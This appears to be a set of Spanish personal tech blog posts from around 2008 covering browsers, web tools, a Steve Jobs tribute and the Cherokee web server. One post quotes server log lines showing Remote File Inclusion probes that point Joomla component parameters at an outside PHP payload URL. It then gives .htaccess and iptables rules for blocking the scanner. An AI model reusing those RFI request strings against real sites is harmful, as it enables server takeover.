0
Hace años comencé mi vida en las computadoras, desde que conocí la programación supe que las computadoras serían mis herramientas de trabajo.
Recuerdo bien los días en los que iba a casa de un amigo y yo quedaba sorprendido por las maravillas que hacía con su computadora, yo entendía muy poco de ellas, en ese entonces el sistema operativo se cargaba con discos de 5 1/4 pulgadas, el monitor era monocromático, el sistema operativo no tenía interfaz gráfica, todo se manejaba a través de comandos y todo eso me encantaba, sentía mucha simpatía por lo complejo. Aprender comandos, teclear rápido, aplicar combinaciones de teclas para realizar funciones de manera más rápida fueron cosas que aprendí a hacer por gusto. Aprendí empíricamente, mi amigo me enseñaba cosas básicas, pero me explicaba con detalle cada cosa. Pronto aprendí a formatear un disco flexíble, a cambiar de directorio de trabajo, a listar archivos, a buscarlos, crear carpetas y ejecutar programas. Posteriormente conocí Windows95 y compiladores basados en MS-DOS llamados Clipper y Pascal, fue entonces cuando supe que quería dedicarme a la programación, y tenía una idea en la mente en aquel entonces: “Haz programas para facilitarle las cosas a los demás”.
Al paso de los años cambie Pascal por C, me encantaba el famoso compilador de Borland Turbo C, de hecho hice mi librería “graphics.h” que me dibujaba ventanas y me simulaba animaciones cuando aparecia una ventana o cuando se presionaba un botón, pasaba horas programando tratando de hacer cosas simples y estéticas.
Años más tarde conocí Linux y me enamoré de la distribución de SlackWare con Fluxbox, pasé casi dos semanas descargando esa distribución con un modem dial-up a 48kb/s, pero la espera valió la pena. Probar Slackware con su interfaz totalmente minimalísta Fluxbox un gestor de ventanas liviano y muy potente que usé varios años, aunque las tareas básicas que día a día se tenían que realizar desde consola acabaron con ese amor.
Fué entonces que me decidí a hacerme de una Macintosh, llegué tarde al mundo de Apple, conocía las macs pero nunca había probado de fondo alguna, el diseño, los detalles, el sistema operativo, la interfaz gráfica me conquistaron y quise saber todo acerca de Macintosh, y así supe de Steve Jobs.
Él había hecho lo que yo quería años atrás, software para facilitar el trabajo cotidiano a las personas, software para hacer las cosas básicas como deben ser, simples.
Si soy actualmente un Apple FanBoy en parte es por Steve Jobs, que me inspiró a seguir con mi camino como programador de software, a buscar siempre la innovación y la simplicidad en lo que programo.
Durente estos ultimos meses me he aferrado a una frase personal que fue inspirada en parte por el trabajo de Steve Jobs :
Este es mi humilde homenaje al más grande visionario y CEO tecnológico de todos los tiempos.
Hasta siempre Steve Jobs.
Once you go a mac never go back
Bueno como los chicos de TUAW comentaban ayer por la tarde, Google hizo publicidad en un comic elaborado por Scott McCloud, 38 páginas del comic donde explica muy claramente las ventajas y el porqué de este navegador.
Se ha confirmado que el dia de Hoy 2 de septiembre Google a través de su blog oficial anunciará la liberación de este nuevo navegador que se suma a los ya conocidos hasta ahora.
Esperaremos y actualizaré esta entrada en cuanto sepa la dirección de descarga o tenga nueva información, aunque me imagino que todo el internet estará atento igual o más que yo. Tendré que actualizar dentro de unas semanas el post que hice mencionando a los navegadores más sobresalientes en la actualidad.
No dudo que sea un navegador con buena aceptación, claro viniendo de la empresa más poderosa que hay en internet.
Update: Aparecen las primeras capturas de pantalla de Google Chrome
Vía Techcrunch me entero que aparecen las primeras capturas de pantalla y al parecer algunos videos donde se muestra la forma y el funcionamiento de este navegador.
Update 2: Ya esta disponible Google Chrome para su descarga (solo windows por ahora) Descarga Google Chrome
Bueno en la página de Open Tape se puede descargar el código para montar tu Mixtape a tu sitio personal.
Los pasos para su instalación son:
- Bajar el código de Open Tape
- Descomprimir el código
- Crear una carpeta en la forma: http://tusitio/directorio_opentape/
- Abrir http://tusitio/directorio_opentape/
- Crear un password
- Subir canciones
Los requisitos son:
- Apache 1.x, 2x
- PHP 5
- La extensión cURL (requerida si quieres notificar y publicar tu MixTape a la Red de Open Tape)
Pueden ver mi Mixtape en:
http://rd.entrebits.com.mx/opentape/
o bien el código para insertarlo en HTML en forma de reproductor:
Después de 5 meses de la liberación de Internet Explorer Beta 1, Microsoft acabó de liberar la Beta 2. Comenté en un post anterior acerca de mis impresiones de los principales navegadores, por aquel tiempo mencionaba que Mozilla dominaba por completo el tema de los plugins o extensiones, ahora Microsoft viene duro con el tema de los “addons”. No he probado esta versión de IE pero en cuanto lo haga dejaré nuevamente mi opinión aquí.
Dejo el link al sitio oficial de descarga. Microsoft Internet Explorer 8 Beta 2
IM Feeds es un servicio muy práctico para todos los que usamos Feeds. El funcionamiento es sencillo solo tienes que agregar al bot en tu cliente de mensajería (MSN Messenger, Google Talk, Yahoo! Messenger) teclear join para registrarte al servicio, darle click a un vínculo para confirmar tu registro y teclear en la ventana de conversación del bot sub http://urldel/feed para que el bot te mande mensajes sobre actualizaciones del feed y unsub http://urldel/feed para darte de baja de las actualizaciones del feed.
Práctico no?
Enlace: IM Feeds
Si alguna vez haz hecho alguna web, theme, intefaz web seguramente te topaste con el problema de probar como se ve tu trabajo en las diferentes versiones de IE, aunque Microsoft no permite la instalación de multiples IE, algunos hacks nos permiten tenerlos, pero… ¿Apoco no es un poco inestable?
La solución es IETester, una herramienta compatible con Windows XP/Vista que permite cambiar entre los diferentes motores de las diferentes versiones de IE en una sola ventana
Pesa al rededor de 23.8Mb y contiene los motores de los navegadores IE8 beta 1, IE7, IE 6 y IE5.5.
via: ajaxian
Enlace: IETester
Google ha lanzado el API de Google Earth, que básicamente permite ver mapas en 3D en los navegadores, ¿Cuales? Firefox 2.x, IE6 y IE7 todos para Windows (lamentablemente).
Entre las características de esta API actualmente se encuentran: PlaceMarks (marcar lugares específicos), añadir balloons de información, mover la cámara y crear polígonos.
¿Por donde empezar?
Pues un buen comienzo es obtener la API Key y leer la documentación 
¿Una prueba?
En los blogs es muy común ver botones para agregar las entradas de los posts a digg, reddit, StumbleUpon, meneame, etc., cada vez hay más redes sociales y más botones con ellas.
Si bien es cierto con el botón Sharethis podemos ahorrar algo de espacio y poner un poco más limpio el contenido de nuestro posts, siempre habrán botones que nuestros visitantes nunca utilicen.
SocialHistory es un código en javascript que ayuda a detectar las redes sociales de tus visitantes, esto ayuda a mostrar solo las redes que a tu visitante le interesan.
En el post anterior hablaba de intrusos que buscan detectar vulnerabilidades de algunos scripts.
Bueno pues veo que cada vez hay un mayor número de estas “herramientas” (para kiddies) que no hacen otra cosa que hacernos perder el tiempo.
Voy a dedicar una sección en este blog para hablar acerca de estas herramientas, pero primero, lo primero.
217.118.2.160 – - [20/Apr/2008:18:03:37 -0500] “GET /components/com_forum/download.php?phpbb_root_path?=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 310 “-” “Morfeus Fucking Scanner”
217.118.2.160 – - [20/Apr/2008:18:03:37 -0500] “GET /components/com_smf/smf.php?mosConfig_absolute_path=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 303 “-” “Morfeus Fucking Scanner”
217.118.2.160 – - [20/Apr/2008:18:03:37 -0500] “GET /components/com_forum/download.php?phpbb_root_path?=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 310 “-” “Morfeus Fucking Scanner”
217.118.2.160 – - [20/Apr/2008:18:03:37 -0500] “GET /components/com_smf/smf.php?mosConfig_absolute_path=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 303 “-” “Morfeus Fucking Scanner”
217.118.2.160 – - [20/Apr/2008:18:03:37 -0500] “GET /components/com_forum/download.php?phpbb_root_path?=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 310 “-” “Morfeus Fucking Scanner”
217.118.2.160 – - [20/Apr/2008:18:03:37 -0500] “GET /components/com_smf/smf.php?mosConfig_absolute_path=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 303 “-” “Morfeus Fucking Scanner”
Como podrán ver en esos logs, hacen peticiones hacia archivos específicos. Por el nombre de los directorios se puede deducir claramente que los directorios que buscan pertenecen a la estructura de el CMS Joomla.
Deben de usar un scanner de ips, por que ni siquiera se tomaron la molestia de verificar si en este servidor hay Joomla instalado (no, no hay, ni lo habrá).
Algunos blogs recomiendan bannear ese user-agent “Morfeus Fucking Scanner”, lo cual si serviría temporalmente, ya que cambiando el user-agent del scanner se soluciona el asunto.
Para bloquear ese scanner por medio de su user-agent basta con agregar esto al .htaccess
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Morfeus
RewriteRule ^.*$ - [F]
Con estas líneas se le denegaría el acceso al user-agent, pero no a la ip.
Otros recomiendan devolverles el favor a los espías con estas líneas
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (^Morfeus) [NC]
RewriteRule .* http://%{REMOTE_ADDR} [r=301,l]
Con las líneas anteriores se hace un forwarding a la misma ip de donde proviene el ataque. Pero al igual que con el código anterior, solo se le denegará el acceso al user-agent y no a la ip.
Yo recomiendo agregar reglas para banear las ips.
iptables -A INPUT -s LAIP -j DROP
Pero si no tenemos acceso a las iptables, también podremos bannear a los espías mediante el archivo .htaccess de la siguiente manera:
#Morfeus Fucking Hacker
deny from 217.118.2.160
Se que es algo molesto andar editando el archivo cada vez que un nuevo espía se acerque a nosotros, pero es mejor que podemos hacer sino tenemos acceso para bannear desde iptables.
¿Pero que ganan exactamente los espías al encontrar lo que buscan?
Bueno pues pongamos atención a la siguiente línea:
217.118.2.160 – - [20/Apr/2008:18:03:37 -0500] “GET /components/com_forum/download.php?phpbb_root_path?=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 310 “-” “Morfeus Fucking Scanner”
Lo que buscan hacer se llama RFI (Remote File Inclusion) que consiste según wikipedia en:
Remote File Inclusion, traducido al español como Inclusión Remota de Archivos – vulnerabilidad existente solamente en páginas dinámicas en PHP que permite el enlace de archivos remotos situados en otros servidores a causa de una mala programación de la página que contiene la función include().
En pocas palabras ellos cuelgan un archivo en otro servidor (En este caso http://dwlz2.dwlz2.com/~dwlz2/ice.txt) que tiene código PHP que permite al atacante tomar control sobre el servidor, o al menos, usar código PHP para construir scripts para funciones específicas (spam, defaces, craking, etc). Verdaderamente es de extrema importancia cuidarnos de este tipo de ataques, ya que muchas cosas se ven comprometidas (Incluso la Base de datos).
Entre módulos que no ocupo, procesos innecesarios en mi servidor, y configuraciones por demás sobradas, mi servidor web esta funcionando un poco más lento que de lo normal.
Buscando un poco por la red encontré Cherokee, un magnífico Servidor Web escrito enteramente en lenguaje C que cuenta con todas las características necesarias para montar un CMS como WordPress, el favorito de los bloggers.
¿Que ofrece?
Para empezar, es super rápido (mucho más que mi configuración actual de Apache), fácil de instalar y configurar. Soporta CGI, FastCGI, SCGI, PHP, CGI, y conexiones seguras (encriptadas) TLS y SSL.
No es un secreto la importancia de tener servidores rápidos, sobre todo en la comunidad bloggera. Ayuda muchísimo a los lectores de nuestro blog, uno o dos segundos realmente cuentan.
Actualmente cuento con un servidor dedicado donde alojo este blog y varios sitios de amigos. Los blogs robustos con muchos miles de visitas diarias seguramente usaran Lighttpd, sin embargo Cherokee en su versión actual 0.6 puede ser considerado una opción para los bloggers que cuentan con un servidor dedicado propio y quieren aumentar la velocidad y rendimiento, además de ser un proyecto hispano.
Me agradó mucho su interfaz de administración bastante “user-friendly” desde la cual configurar Mime Types, Servidores Virtuales, alias, y demás parametros requeridos ,según nuestras necesidades, es muy intuitivo, rápido y fácil.
Por todas las características, considero que Cherokee debería ser una opción importante para la comunidad bloggera.
